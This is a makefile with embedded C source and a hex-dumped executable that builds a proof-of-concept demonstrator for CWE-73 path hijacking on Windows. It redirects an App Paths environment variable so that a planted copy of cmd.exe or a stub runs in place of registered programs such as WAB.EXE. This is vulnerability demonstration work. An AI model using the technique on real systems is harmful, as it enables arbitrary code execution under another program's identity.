# Copyright (C) 2004-2025, Stefan Kanthak <stefan.kanthak@nexgo.de>

# * The software is provided "as is" without any warranty, neither express
#   nor implied.
# * In no event will the author be held liable for any damage(s) arising
#   from the use of the software.
# * Redistribution of the software is allowed only in unmodified form.
# * Permission is granted to use the software solely for personal private
#   and non-commercial purposes.
# * An individuals use of the software in his or her capacity or function
#   as an agent, (independent) contractor, employee, member or officer of
#   a business, corporation or organization (commercial or non-commercial)
#   does not qualify as personal private and non-commercial purpose.
# * Without written approval from the author the software must not be used
#   for a business, for commercial, corporate, governmental, military or
#   organizational purposes of any kind, or in a commercial, corporate,
#   governmental, military or organizational environment of any kind.

.SUFFIXES:

_CL_=
CL=
LIBPATH=
LINK=
LOG_BUILD_COMMANDLINES=

all: CWE-73.DOS CWE-73.COM CWE-73.DLL CWE-73.EXE
	"$(MAKEDIR)\CWE-73.COM" WAB.EXE

clobber: clean
	ERASE CWE-73.DOS CWE-73.COM CWE-73.DLL CWE-73.EXE

clean:
	ERASE CWE-73.OBJ

cabinet: CWE-73.CAB
	SIGNTOOL.EXE Sign /A /D "eSKamation Canaries" /DU "https://skanthak.hier-im-netz.de/cwe-73.html" /N "Stefan Kanthak" /T "http://timestamp.digicert.com/" /V $**
#	SIGNTOOL.EXE Sign /AS /D "eSKamation Canaries" /DU "https://skanthak.hier-im-netz.de/cwe-73.html" /FD SHA256 /N "Stefan Kanthak" /TD SHA256 /TR "http://timestamp.digicert.com/" /V $**

CWE-73.CAB: CWE-73.MAK # CWE-73.DOS CWE-73.COM CWE-73.DLL CWE-73.EXE
	MAKECAB.EXE /D CabinetNameTemplate=$@ /D CompressionLevel=7 /D CompressionMemory=21 /D CompressionType=LZX /D DiskDirectoryTemplate= /D InfFileName=NUL: /D RptFileName=NUL: /F <<
CWE-73.COM
CWE-73.DLL
CWE-73.EXE
<<NOKEEP

CWE-73.COM: CWE-73.OBJ # CWE-73.DOS
	LINK.EXE /LINK /BREPRO /DEFAULTLIB:advapi32 /DEFAULTLIB:kernel32 /DEFAULTLIB:shell32 /DEFAULTLIB:user32 /ENTRY:wmainCRTStartup /FIXED /LARGEADDRESSAWARE /MERGE:.rdata=.const /MERGE:.text=.code /NOCOFFGRPINFO /NOLOGO /NXCOMPAT /OPT:REF /OSVERSION:6.0 /OUT:$@ /RELEASE /STUB:CWE-73.DOS /SUBSYSTEM:CONSOLE /SWAPRUN:CD,NET /VERSION:0.815 $**

CWE-73.OBJ: CWE-73.MAK
	CL.EXE /Brepro /c /DIMAGE /Fo$@ /GA /GF /Gw /Gy /nologo /O2 /Os /Oy /Tc<< /W4 /we4013 /Zl
// Copyright (C) 2004-2025, Stefan Kanthak <stefan.kanthak@nexgo.de>

// https://msdn.microsoft.com/en-us/library/7f0aews7.aspx

#pragma comment(compiler)

#define _CRT_SECURE_NO_WARNINGS

// https://msdn.microsoft.com/en-us/library/aa383732.aspx

#define STRICT
#define UNICODE
#define WIN32_LEAN_AND_MEAN

#include <windows.h>
#include <shellapi.h>

#define FILE_SHARE_NONE	0UL

// https://msdn.microsoft.com/en-us/library/hh916382.aspx

__declspec(safebuffers)
BOOL	CDECL	PrintConsole(HANDLE hConsole, [SA_FormatString(Style="printf")] LPCWSTR lpFormat, ...)
{
	WCHAR	szOutput[1025];
	DWORD	dwOutput;
	DWORD	dwConsole;

	// https://msdn.microsoft.com/en-us/library/kb57fad8.aspx

	va_list	vaInput;
	va_start(vaInput, lpFormat);

	// https://msdn.microsoft.com/en-us/library/ms647551.aspx

	dwOutput = wvsprintf(szOutput, lpFormat, vaInput);

	va_end(vaInput);

	if (dwOutput == 0UL)
		return FALSE;

	// https://msdn.microsoft.com/en-us/library/ms687401.aspx

	if (!WriteConsole(hConsole, szOutput, dwOutput, &dwConsole, NULL))
		return FALSE;

	return dwConsole == dwOutput;
}

// [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\PowerShell.exe]
// @=expand:"%SystemRoot%\\System32\\WindowsPowerShell\\v1.0\\PowerShell.exe"

// [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\tabtip.exe]
// @=expand:"%CommonProgramFiles%\\Microsoft Shared\\Ink\\tabtip.exe"

// [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\wab.exe]
// @=expand:"%ProgramFiles%\\Windows Mail\\wab.exe"

// [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\write.exe]
// @=expand:"%ProgramFiles%\\Windows NT\\Accessories\\WordPad.exe"

// [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\<application>]
// @=expand:"%<variable>%\\<directory>\\[<directory>\\]<victim>"

// [HKEY_LOCAL_MACHINE\SOFTWARE\Classes\batfile\shell\runas\command]
// @=expand:"%SystemRoot%\\System32\\cmd.exe /C \"%1\" %*"

// https://msdn.microsoft.com/en-us/library/aa374912.aspx

typedef	struct	_ace
{
	// https://msdn.microsoft.com/en-us/library/aa374919.aspx

	ACE_HEADER	Header;

	// https://msdn.microsoft.com/en-us/library/aa374892.aspx

	ACCESS_MASK	Mask;

	// https://msdn.microsoft.com/en-us/library/aa379594.aspx

	SID		Trustee;
} ACE;

const	struct	_acl
{
	// https://msdn.microsoft.com/en-us/library/aa374931.aspx

	ACL	acl;

	ACE	ace;
} dacl = {{ACL_REVISION, 0U, sizeof(dacl), 1U, 0U},
#if 1	// (A;CIOI;FA;;;OW)
         {{ACCESS_ALLOWED_ACE_TYPE, CONTAINER_INHERIT_ACE | OBJECT_INHERIT_ACE, sizeof(ACE)},
          FILE_ALL_ACCESS,
          {SID_REVISION, ANYSIZE_ARRAY, SECURITY_CREATOR_SID_AUTHORITY, SECURITY_CREATOR_OWNER_RIGHTS_RID}}};
#else	// (A;CIOI;0x1f0000;;;OW)
         {{ACCESS_ALLOWED_ACE_TYPE, CONTAINER_INHERIT_ACE | OBJECT_INHERIT_ACE, sizeof(ACE)},
          STANDARD_RIGHTS_ALL,
          {SID_REVISION, ANYSIZE_ARRAY, SECURITY_CREATOR_SID_AUTHORITY, SECURITY_CREATOR_OWNER_RIGHTS_RID}}};
#endif
// https://msdn.microsoft.com/en-us/library/aa379561.aspx
// https://msdn.microsoft.com/en-us/library/aa379566.aspx

const	SECURITY_DESCRIPTOR	sd = {SECURITY_DESCRIPTOR_REVISION,
				      0U,
				      SE_DACL_PRESENT | SE_DACL_PROTECTED,
				      (SID *) NULL,
				      (SID *) NULL,
				      (ACL *) NULL,
				      &dacl.acl};

// https://msdn.microsoft.com/en-us/library/aa379560.aspx

const	SECURITY_ATTRIBUTES	sa = {sizeof(sa),
				      &sd,
				      FALSE};
#ifdef IMAGE
__declspec(align(512))
struct
{
	union
	{
		struct
		{
			IMAGE_DOS_HEADER	dos;
			IMAGE_NT_HEADERS32	nt32;
			IMAGE_SECTION_HEADER	coff;
		};
		BYTE	header[512];
	};
	union
	{
		BYTE	code[512];
	};
} const	image = {{{{IMAGE_DOS_SIGNATURE,
	            sizeof(IMAGE_DOS_HEADER),
	            1U,
	            0U,
	            sizeof(IMAGE_DOS_HEADER) / 16,
	            0U,
	            65535U,
	            0U,
	            0U,
	            0U,
	            0U,
	            0U,
	            sizeof(IMAGE_DOS_HEADER),
	            0U,
	            0U, 0U, 0U, 0H,
	            0x5719U,
	            0x2704U,
	            0U, 0U, 0U, 0U, 0U, 0U, 0U, 0U, 0U, 0U,
	            sizeof(IMAGE_DOS_HEADER)},
	           {IMAGE_NT_SIGNATURE,
	            {IMAGE_FILE_MACHINE_I386,
	             1U,		// NumberOfSections
	             'VOID',		// TimeDateStamp
	             0UL,		// PointerToSymbolTable
	             0UL,		// NumberOfSymbols
	             sizeof(IMAGE_OPTIONAL_HEADER32),
	             IMAGE_FILE_32BIT_MACHINE | IMAGE_FILE_EXECUTABLE_IMAGE | IMAGE_FILE_NET_RUN_FROM_SWAP | IMAGE_FILE_RELOCS_STRIPPED |IMAGE_FILE_REMOVABLE_RUN_FROM_SWAP},
	            {IMAGE_NT_OPTIONAL_HDR32_MAGIC,
	             10U, 0U,		// LinkerVersion
	             1UL << 9,		// SizeOfCode
	             0UL,		// SizeOfInitializedData
	             0UL,		// SizeOfUninitializedData
	             1UL << 12,		// AddressOfEntryPoint
	             1UL << 12,		// BaseOfCode
	             0UL,		// BaseOfData
	             1UL << 16,		// ImageBase
	             1UL << 12,		// SectionAlignment
	             1UL << 9,		// FileAlignment
	             4U, 0U,		// OperatingSystemVersion
	             0U, 815U,		// ImageVersion
	             4U, 0U,		// SubsystemVersion
	             0UL,		// Win32VersionValue
	             2UL << 12,		// SizeOfImage
	             1UL << 9,		// SizeOfHeaders
	             57533UL,		// CheckSum
	             IMAGE_SUBSYSTEM_WINDOWS_CUI,
	             IMAGE_DLLCHARACTERISTICS_NO_SEH | IMAGE_DLLCHARACTERISTICS_NX_COMPAT | IMAGE_DLLCHARACTERISTICS_TERMINAL_SERVER_AWARE,
	             1UL << 16,		// SizeOfStackReserve
	             1UL << 12,		// SizeOfStackCommit
	             1UL << 16,		// SizeOfHeapReserve
	             1UL << 12,		// SizeOfHeapCommit
	             0UL,		// LoaderFlags
	             IMAGE_NUMBEROF_DIRECTORY_ENTRIES,
	             {{0UL, 0UL},	// Export Directory
	              {0UL, 0UL},	// Import Directory
	              {0UL, 0UL},	// Resource Directory
	              {0UL, 0UL},	// Exception Directory
	              {0UL, 0UL},	// Security Directory
	              {0UL, 0UL},	// Base Relocation Table
	              {0UL, 0UL},	// Debug Directory
	              {0UL, 0UL},	// Architecture Specific Data
	              {0UL, 0UL},	// RVA of GP
	              {0UL, 0UL},	// TLS Directory
	              {0UL, 0UL},	// Load Configuration Directory
	              {0UL, 0UL},	// Bound Import Directory
	              {0UL, 0UL},	// Import Address Table
	              {0UL, 0UL},	// Delay Load Import Descriptors
	              {0UL, 0UL},	// COM Runtime Descriptor
	              {0UL, 0UL}}}},
	           {".code",
	            6UL,		// Misc.VirtualSize
	            1UL << 12,		// VirtualAddress
	            1UL << 9,		// SizeOfRawData
	            1UL << 9,		// PointerToRawData
	            0UL,		// PointerToRelocations
	            0UL,		// PointerToLinenumbers
	            0U,			// NumberOfRelocations
	            0U,			// NumberOfLinenumbers
	            IMAGE_SCN_MEM_EXECUTE | IMAGE_SCN_MEM_READ | IMAGE_SCN_CNT_CODE}}},
					// __asm { mov eax, 123456789
					//         ret }
	           {0xB8, 0x15, 0xCD, 0x5B, 0x07, 0xC3}};
#endif

// https://msdn.microsoft.com/en-us/library/f9t8842e.aspx

__declspec(noreturn)
VOID	CDECL	wmainCRTStartup(VOID)
{
	// https://msdn.microsoft.com/en-us/library/bb759784.aspx

	SHELLEXECUTEINFO sei = {sizeof(sei),
	                        SEE_MASK_NOASYNC | SEE_MASK_NOCLOSEPROCESS | SEE_MASK_NO_CONSOLE | SEE_MASK_WAITFORINPUTIDLE,
	                        HWND_DESKTOP,
	                        L"Open",
	                        (LPCWSTR) NULL,
	                        L"/E:ON /D /C ECHO %CMDCMDLINE%",
	                        (LPCWSTR) NULL,
	                        SW_SHOWNORMAL,
	                        (HINSTANCE) NULL,
	                        NULL,
	                        (LPCWSTR) NULL,
	                        HKEY_CLASSES_ROOT,
	                        0UL,
	                        NULL,
	                        NULL};
	INT	nArguments;
	LPWSTR	*lpArguments;
	LPWSTR	lpFirst, lpLast, lpNext;
	HKEY	hkAppPaths;
	WCHAR	szCWD[MAX_PATH];
	WCHAR	szBuffer[MAX_PATH];
	DWORD	dwBuffer = sizeof(szBuffer);
	DWORD	dwProcess;
	DWORD	dwValue = ERROR_SUCCESS;
	DWORD	dwError = ERROR_BAD_ARGUMENTS;
#ifdef IMAGE
	DWORD	dwImage;
	HANDLE	hImage;
#endif
	// https://msdn.microsoft.com/en-us/library/ms683231.aspx

	HANDLE	hConsole = GetStdHandle(STD_ERROR_HANDLE);

	if (hConsole == INVALID_HANDLE_VALUE)
		dwError = GetLastError();
	else
	{	// https://msdn.microsoft.com/en-us/library/bb776391.aspx

		lpArguments = CommandLineToArgvW(GetCommandLine(), &nArguments);

		if (lpArguments == NULL)
			PrintConsole(hConsole,
			             L"%ls() returned error %lu\n",
			             L"CommandLineToArgv", dwError = GetLastError());
		else
		{
			if (nArguments != 2)
				PrintConsole(hConsole,
				             L"Bad arguments: a single name of a registered application must be given!\n");
			else
			{	// https://msdn.microsoft.com/en-us/library/ms724897.aspx

				dwError = RegOpenKeyEx(HKEY_LOCAL_MACHINE,
				                       L"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\App Paths",
				                       REG_OPTION_RESERVED,
				                       KEY_READ,
				                       &hkAppPaths);

				if (dwError != ERROR_SUCCESS)
					PrintConsole(hConsole,
					             L"%ls() returned error %lu\n",
					             L"RegOpenKeyEx", dwError);
				else
				{	// https://msdn.microsoft.com/en-us/library/ms724868.aspx

					dwValue = RegGetValue(hkAppPaths,
					                      lpArguments[1],
					                      (LPCWSTR) NULL,
					                      RRF_NOEXPAND | RRF_RT_REG_EXPAND_SZ | RRF_RT_REG_SZ,
					                      (LPDWORD) NULL,
					                      szBuffer,
					                      &dwBuffer);

					// https://msdn.microsoft.com/en-us/library/ms724837.aspx

					dwError = RegCloseKey(hkAppPaths);

					if (dwError != ERROR_SUCCESS)
						PrintConsole(hConsole,
						             L"%ls() returned error %lu\n",
						             L"RegCloseKey", dwError);
				}

				if (dwValue != ERROR_SUCCESS)
					PrintConsole(hConsole,
					             L"%ls() returned error %lu for application \'%ls\'\n",
					             L"RegGetValue", dwError = dwValue, lpArguments[1]);
				else
				{	// https://msdn.microsoft.com/en-us/library/b34ccac3.aspx
#if 0
					lpFirst = wcschr(szBuffer, L'\\');

					// https://msdn.microsoft.com/en-us/library/ftw0heb9.aspx

					lpLast = wcsrchr(szBuffer, L'\\');
#elif 0
					lpLast = wmemrchr(szBuffer, L'\\', dwBuffer /= sizeof(*szBuffer);

					// https://msdn.microsoft.com/en-us/library/d7zdhf37.aspx

					lpFirst = wmemchr(szBuffer, L'\\', dwBuffer));
#else
					lpFirst = szBuffer;
					lpLast = szBuffer + dwBuffer / sizeof(*szBuffer);

					while ((lpLast > lpFirst) && (*--lpLast != L'\\'))
						continue;

					while ((lpFirst < lpLast) && (*++lpFirst != L'\\'))
						continue;
#endif
					if ((lpFirst == lpLast)
					 || (lpFirst[-1] != L'%')
					 || (szBuffer[0] != L'%'))
						PrintConsole(hConsole,
						             L"Registered pathname \'%ls\' must start with a percent sign and contain at least 2 backslashes!\n",
						             szBuffer);
					else
					{	// https://msdn.microsoft.com/en-us/library/aa364934.aspx

						if (GetCurrentDirectory(sizeof(szCWD) / sizeof(*szCWD), szCWD) == 0UL)
							PrintConsole(hConsole,
							             L"%ls() returned error %lu\n",
							             L"GetCurrentDirectory", dwError = GetLastError());
						else
						{
							*--lpFirst = L'\0';
							lpNext = ++lpFirst;

							do
							{	// https://msdn.microsoft.com/en-us/library/b34ccac3.aspx
#if 0
								lpNext = wcschr(lpNext + 1, L'\\');
#elif 0
								// https://msdn.microsoft.com/en-us/library/d7zdhf37.aspx

								lpNext = wmemchr(lpNext + 1, L'\\', lpLast - lpNext - 1);
#else
								while (*++lpNext != L'\\')
									continue;
#endif
								*lpNext = L'\0';

								// https://msdn.microsoft.com/en-us/library/aa363855.aspx

								if (!CreateDirectory(lpFirst + 1, &sa))
									break;

								*lpNext = L'\\';
							} while (lpNext != lpLast);

							if (lpNext != lpLast)
								PrintConsole(hConsole,
								             L"%ls() returned error %lu for directory \'%ls%ls\'\n",
								             L"CreateDirectory", dwError = GetLastError(), szCWD, lpFirst);
							else
#ifndef IMAGE
							{	// https://msdn.microsoft.com/en-us/library/aa363851.aspx

								if (!CopyFile(L"C:\\Windows\\System32\\cmd.exe", lpFirst + 1, FALSE))
									PrintConsole(hConsole,
									             L"%ls() returned error %lu for file \'%ls%ls\'\n",
									             L"CopyFile", dwError = GetLastError(), szCWD, lpFirst);
#else
							{	// https://msdn.microsoft.com/en-us/library/aa363858.aspx

								hImage = CreateFile(lpFirst + 1,
								                    FILE_WRITE_DATA,
								                    FILE_SHARE_NONE,
								                    (LPSECURITY_ATTRIBUTES) NULL,
								                    CREATE_NEW,
								                    FILE_ATTRIBUTE_NORMAL,
								                    (HANDLE) NULL);

								if (hImage == INVALID_HANDLE_VALUE)
									PrintConsole(hConsole,
									             L"%ls() returned error %lu for file \'%ls%ls\'\n",
									             L"CreateFile", dwError = GetLastError(), szCWD, lpFirst);
								else
								{	// https://msdn.microsoft.com/en-us/library/aa365747.aspx

									if (!WriteFile(hImage,
									               &image,
									               sizeof(image),
									               &dwImage,
									               (LPOVERLAPPED) NULL))
										dwError = GetLastError();
									else
										if (dwImage != sizeof(image))
											dwError = ERROR_WRITE_FAULT;

									// https://msdn.microsoft.com/en-us/library/ms724211.aspx

									if (!CloseHandle(hImage))
										PrintConsole(hConsole,
										             L"%ls() returned error %lu\n",
										             L"CloseHandle", GetLastError());
								}

								if (dwError != ERROR_SUCCESS)
									PrintConsole(hConsole,
									             L"%ls() returned error %lu\n",
									             L"WriteFile", dwError);
#endif
								else
								{	// https://msdn.microsoft.com/en-us/library/ms686206.aspx

									if (!SetEnvironmentVariable(szBuffer + 1, szCWD))
										PrintConsole(hConsole,
										             L"SetEnvironmentVariable() returned error %lu for %ls=%ls\n",
										             dwError = GetLastError(), szBuffer, szCWD);
									else
									{
									//	sei.lpVerb = L"Open";
										sei.lpFile = lpArguments[1];
									//	sei.lpParameters = L"/E:ON /D /C ECHO %CMDCMDLINE%";
									//	sei.lpDirectory = szCWD;

										// https://msdn.microsoft.com/en-us/library/bb762154.aspx

										if (!ShellExecuteEx(&sei))
											PrintConsole(hConsole,
											             L"%ls() returned error %lu for application \'%ls\'\n",
											             L"ShellExecuteEx", dwError = GetLastError(), lpArguments[1]);
										else
											if (sei.hProcess != NULL)
											{
												// https://msdn.microsoft.com/en-us/library/ms687032.aspx

												if (WaitForSingleObject(sei.hProcess, INFINITE) == WAIT_FAILED)
													PrintConsole(hConsole,
													             L"%ls() returned error %lu\n",
													             L"WaitForSingleObject", dwError = GetLastError());

												// https://msdn.microsoft.com/en-us/library/ms683189.aspx

												if (!GetExitCodeProcess(sei.hProcess, &dwProcess))
													PrintConsole(hConsole,
													             L"%ls() returned error %lu\n",
													             L"GetExitCodeProcess", dwError = GetLastError());
												else
													if (dwProcess > 65535UL)
														PrintConsole(hConsole,
														             L"Process \'%ls\' exited with code 0x%08lX\n",
														             lpArguments[1], dwProcess);
													else
														PrintConsole(hConsole,
														             L"Process \'%ls\' exited with code %lu\n",
														             lpArguments[1], dwProcess);

												// https://msdn.microsoft.com/en-us/library/ms724211.aspx

												if (!CloseHandle(sei.hProcess))
													PrintConsole(hConsole,
													             L"%ls() returned error %lu\n",
													             L"CloseHandle", dwError = GetLastError());
											}
									}

									// https://msdn.microsoft.com/en-us/library/aa363915.aspx

									if (!DeleteFile(lpFirst + 1))
										PrintConsole(hConsole,
										             L"%ls() returned error %lu for file \'%ls%ls\'\n",
										             L"DeleteFile", dwError = GetLastError(), szCWD, lpFirst);
									do
									{
										*lpLast = L'\0';

										// https://msdn.microsoft.com/en-us/library/aa365488.aspx

										if (!RemoveDirectory(lpFirst + 1))
											break;
#if 0
										// https://msdn.microsoft.com/en-us/library/ftw0heb9.aspx

										lpLast = wcsrchr(lpFirst, L'\\');
#elif 0
										lpLast = wmemrchr(lpFirst, L'\\', lpLast - lpFirst);
#else
										while (*--lpLast != L'\\')
											continue;
#endif
									} while (lpLast != lpFirst);

									if (lpLast != lpFirst)
										PrintConsole(hConsole,
										             L"%ls() returned error %lu for directory \'%ls%ls\'\n",
										             L"RemoveDirectory", dwError = GetLastError(), szCWD, lpFirst);
								}
							}
						}
					}
				}
			}

			// https://msdn.microsoft.com/en-us/library/aa366730.aspx

			if (LocalFree(lpArguments) != NULL)
				PrintConsole(hConsole,
				             L"%ls() returned error %lu\n",
				             L"LocalFree", GetLastError());
		}

		// https://msdn.microsoft.com/en-us/library/ms724211.aspx

		if (!CloseHandle(hConsole))
			PrintConsole(hConsole,
			             L"%ls() returned error %lu\n",
			             L"CloseHandle", GetLastError());
	}

	// https://msdn.microsoft.com/en-us/library/ms682658.aspx

	ExitProcess(dwError);
}
<<NOKEEP

CWE-73.EXE: CWE-73.MAK
	CERTUTIL.EXE /DecodeHex /F /V << $@
4d 5a 90 00 01 00 00 00 04 00 00 00 ff ff 00 00   MZ..............
e0 00 00 00 43 00 00 00 40 00 00 00 00 00 00 00   ....C...@.......
00 00 00 00 19 57 04 27 00 00 00 00 00 00 00 00   .....W.'........
00 00 00 00 00 00 00 00 00 00 00 00 90 00 00 00   ................
28 43 29 6f 70 79 72 69 67 68 74 20 32 30 30 34   (C)opyright 2004
2d 32 30 32 35 2c 20 53 74 65 66 61 6e 20 4b 61   -2025, Stefan Ka
6e 74 68 61 6b 20 3c 73 74 65 66 61 6e 2e 6b 61   nthak <stefan.ka
6e 74 68 61 6b 40 6e 65 78 67 6f 2e 64 65 3e 0d   nthak@nexgo.de>.
0a 07 24 0e 1f 33 d2 b4 09 cd 21 b8 01 4c cd 21   .....3....!..L.!
50 45 00 00 4c 01 03 00 56 4f 49 44 00 00 00 00   PE..L...VOID....
00 00 00 00 e0 00 22 0d 0b 01 0a 00 00 02 00 00   ......".........
00 04 00 00 00 00 00 00 00 10 00 00 00 10 00 00   ................
00 20 00 00 00 00 40 00 00 10 00 00 00 02 00 00   . ....@.........
05 00 00 00 00 00 2f 03 05 00 00 00 00 00 00 00   ....../.........
00 40 00 00 00 02 00 00 cc 60 00 00 02 00 40 85   .@.......`....@.
00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00   ................
00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00   ................
18 20 00 00 3c 00 00 00 00 00 00 00 00 00 00 00   . ..<...........
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00   ................
00 30 00 00 10 00 00 00 00 00 00 00 00 00 00 00   .0..............
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00   ................
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00   ................
00 00 00 00 00 00 00 00 00 20 00 00 18 00 00 00   ......... ......
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00   ................
00 00 00 00 00 00 00 00 2e 63 6f 64 65 00 00 00   .........code...
52 00 00 00 00 10 00 00 00 02 00 00 00 02 00 00   R...............
00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60   ............ ..`
2e 63 6f 6e 73 74 00 00 cc 00 00 00 00 20 00 00   .const....... ..
00 02 00 00 00 04 00 00 00 00 00 00 00 00 00 00   ................
00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00   ....@..@.reloc..
10 00 00 00 00 30 00 00 00 02 00 00 00 06 00 00   .....0..........
00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42   ............@..B
55 8b ec 81 ec 08 02 00 00 56 be 04 01 00 00 56   U........V.....V
8d 85 f8 fd ff ff 50 6a 00 ff 15 04 20 40 00 3b   ......Pj.... @.;
c6 73 0a 33 c9 66 89 8c 45 f8 fd ff ff 68 00 04   .s.3.f..E....h..
00 00 6a 00 8d 85 f8 fd ff ff 50 ff 15 00 20 40   ..j.......P... @
00 50 6a 00 ff 15 10 20 40 00 50 ff 15 08 20 40   .Pj.... @.P... @
00 cc 00 00 00 00 00 00 00 00 00 00 00 00 00 00   ................
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00   ................
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00   ................
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00   ................
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00   ................
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00   ................
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00   ................
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00   ................
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00   ................
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00   ................
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00   ................
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00   ................
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00   ................
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00   ................
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00   ................
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00   ................
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00   ................
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00   ................
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00   ................
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00   ................
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00   ................
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00   ................
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00   ................
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00   ................
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00   ................
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00   ................
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00   ................
7a 20 00 00 8c 20 00 00 6c 20 00 00 00 00 00 00   z ... ..l ......
b0 20 00 00 00 00 00 00 54 20 00 00 00 00 00 00   . ......T ......
00 00 00 00 a2 20 00 00 00 20 00 00 64 20 00 00   ..... ... ..d ..
00 00 00 00 00 00 00 00 c0 20 00 00 10 20 00 00   ......... ... ..
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00   ................
00 00 00 00 7a 20 00 00 8c 20 00 00 6c 20 00 00   ....z ... ..l ..
00 00 00 00 b0 20 00 00 00 00 00 00 19 01 45 78   ..... ........Ex
69 74 50 72 6f 63 65 73 73 00 87 01 47 65 74 43   itProcess...GetC
6f 6d 6d 61 6e 64 4c 69 6e 65 57 00 14 02 47 65   ommandLineW...Ge
74 4d 6f 64 75 6c 65 46 69 6c 65 4e 61 6d 65 57   tModuleFileNameW
00 00 4b 45 52 4e 45 4c 33 32 2e 64 6c 6c 00 00   ..KERNEL32.dll..
10 02 4d 65 73 73 61 67 65 42 6f 78 45 78 57 00   ..MessageBoxExW.
55 53 45 52 33 32 2e 64 6c 6c 00 00 00 00 00 00   USER32.dll......
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00   ................
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00   ................
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00   ................
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00   ................
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00   ................
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00   ................
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00   ................
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00   ................
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00   ................
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00   ................
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00   ................
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00   ................
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00   ................
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00   ................
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00   ................
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00   ................
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00   ................
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00   ................
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00   ................
00 10 00 00 10 00 00 00 1b 30 3d 30 46 30 4d 30   .........0=0F0M0
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00   ................
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00   ................
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00   ................
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00   ................
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00   ................
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00   ................
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00   ................
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00   ................
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00   ................
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00   ................
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00   ................
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00   ................
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00   ................
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00   ................
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00   ................
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00   ................
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00   ................
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00   ................
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00   ................
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00   ................
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00   ................
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00   ................
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00   ................
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00   ................
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00   ................
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00   ................
